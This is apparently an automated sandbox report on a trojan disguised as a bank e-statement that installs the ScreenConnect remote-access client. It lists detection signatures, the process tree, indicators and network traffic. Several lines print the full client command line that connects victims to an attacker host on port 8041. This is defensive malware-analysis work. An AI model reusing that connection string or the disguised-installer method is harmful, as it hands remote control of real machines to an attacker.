Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
estatement020134230003.exe.virus.exe

Overview

General Information

Sample name:estatement020134230003.exe.virus.exe
Analysis ID:1569510
MD5:3cc83797cf15bc705fa0b723f03fa5d4
SHA1:38773bb12d9223506573fd5e8eaf9d545b30573c
SHA256:c4e648e5d4284160fbe55ebafcb6f7bf1236f153d5ce0660cdb45568e1287f2f
Tags:connectwiseexetrojanuser-ninjacatcher
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • estatement020134230003.exe.virus.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\estatement020134230003.exe.virus.exe" MD5: 3CC83797CF15BC705FA0B723F03FA5D4)
    • msiexec.exe (PID: 7384 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7416 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7468 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4B0EB90007EAA1AAA53FFC7F9A3C06A0 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7556 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6349687 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7632 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 55E13C22DDD204F783E51197303A9E7C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7680 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 42A8F4A2C940B9BB8BF7F1D0A8DC547D E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7716 cmdline: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7788 cmdline: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "4e7e4252-7a52-43b7-b468-adf4aa363155" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 8008 cmdline: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "106fd89e-6d51-4cff-8c4a-637d8376f30e" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 7908 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
estatement020134230003.exe.virus.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF2BE9192CA85E951C.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF23619B86A3BB53E3.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Temp\~DF7AC8940F9BF3568C.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Windows\Temp\~DF901E3882A4632C12.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              00000000.00000002.1363853523.0000000005690000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000000.00000002.1392397401.00000000074E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000009.00000002.2587568699.0000000002831000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 5 entries
                        SourceRuleDescriptionAuthorStrings
                        9.2.ScreenConnect.WindowsClient.exe.28afa10.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          11.2.ScreenConnect.WindowsClient.exe.2f9fa50.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            9.0.ScreenConnect.WindowsClient.exe.520000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              0.2.estatement020134230003.exe.virus.exe.5690000.11.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                0.2.estatement020134230003.exe.virus.exe.5690000.11.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 4 entries

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c=", ProcessId: 7716, ProcessName: ScreenConnect.ClientService.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (8d1a70ac1b2b845c) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-8114-D4F9E6F7D40D}\(Default)
                                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7908, ProcessName: svchost.exe
                                  No Suricata rule has matched

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: estatement020134230003.exe.virus.exeReversingLabs: Detection: 18%
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.2% probability
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_04370F48 CryptProtectData,8_2_04370F48
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_04371730 CryptProtectData,8_2_04371730
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_060B0D4C CryptUnprotectData,8_2_060B0D4C
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_060B2F88 CryptUnprotectData,8_2_060B2F88
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_060B0D45 CryptUnprotectData,8_2_060B0D45
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeEXE: msiexec.exeJump to behavior
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: certificate valid
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2601854749.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2587568699.0000000002831000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444075114.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1444214059.0000000002EF2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: estatement020134230003.exe.virus.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1370838629.00000000008CD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1350076124.0000000004978000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1352579539.0000000004800000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1350076124.0000000004909000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: estatement020134230003.exe.virus.exe, 60e8b9.msi.3.dr, 60e8b7.msi.3.dr, 60e8b8.rbs.3.dr, MSIEACA.tmp.3.dr, MSIEAEA.tmp.3.dr, ScreenConnect.ClientSetup.msi.0.dr, MSIEDBA.tmp.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: estatement020134230003.exe.virus.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2601854749.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: estatement020134230003.exe.virus.exe, 60e8b9.msi.3.dr, 60e8b7.msi.3.dr, MSIE1B2.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1443805844.0000000002E72000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1443805844.0000000002E72000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2601854749.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: estatement020134230003.exe.virus.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile opened: c:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Source: global trafficTCP traffic: 192.168.2.11:49720 -> 195.250.25.144:8041
                                  Source: Joe Sandbox ViewASN Name: OPTIMITYGB OPTIMITYGB
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: learnskillboosts.con-ip.com
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: svchost.exe, 0000000A.00000002.2586908435.000001DEC1000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1451563252.0000000012F30000.00000004.00000800.00020000.00000000.sdmp, estatement020134230003.exe.virus.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
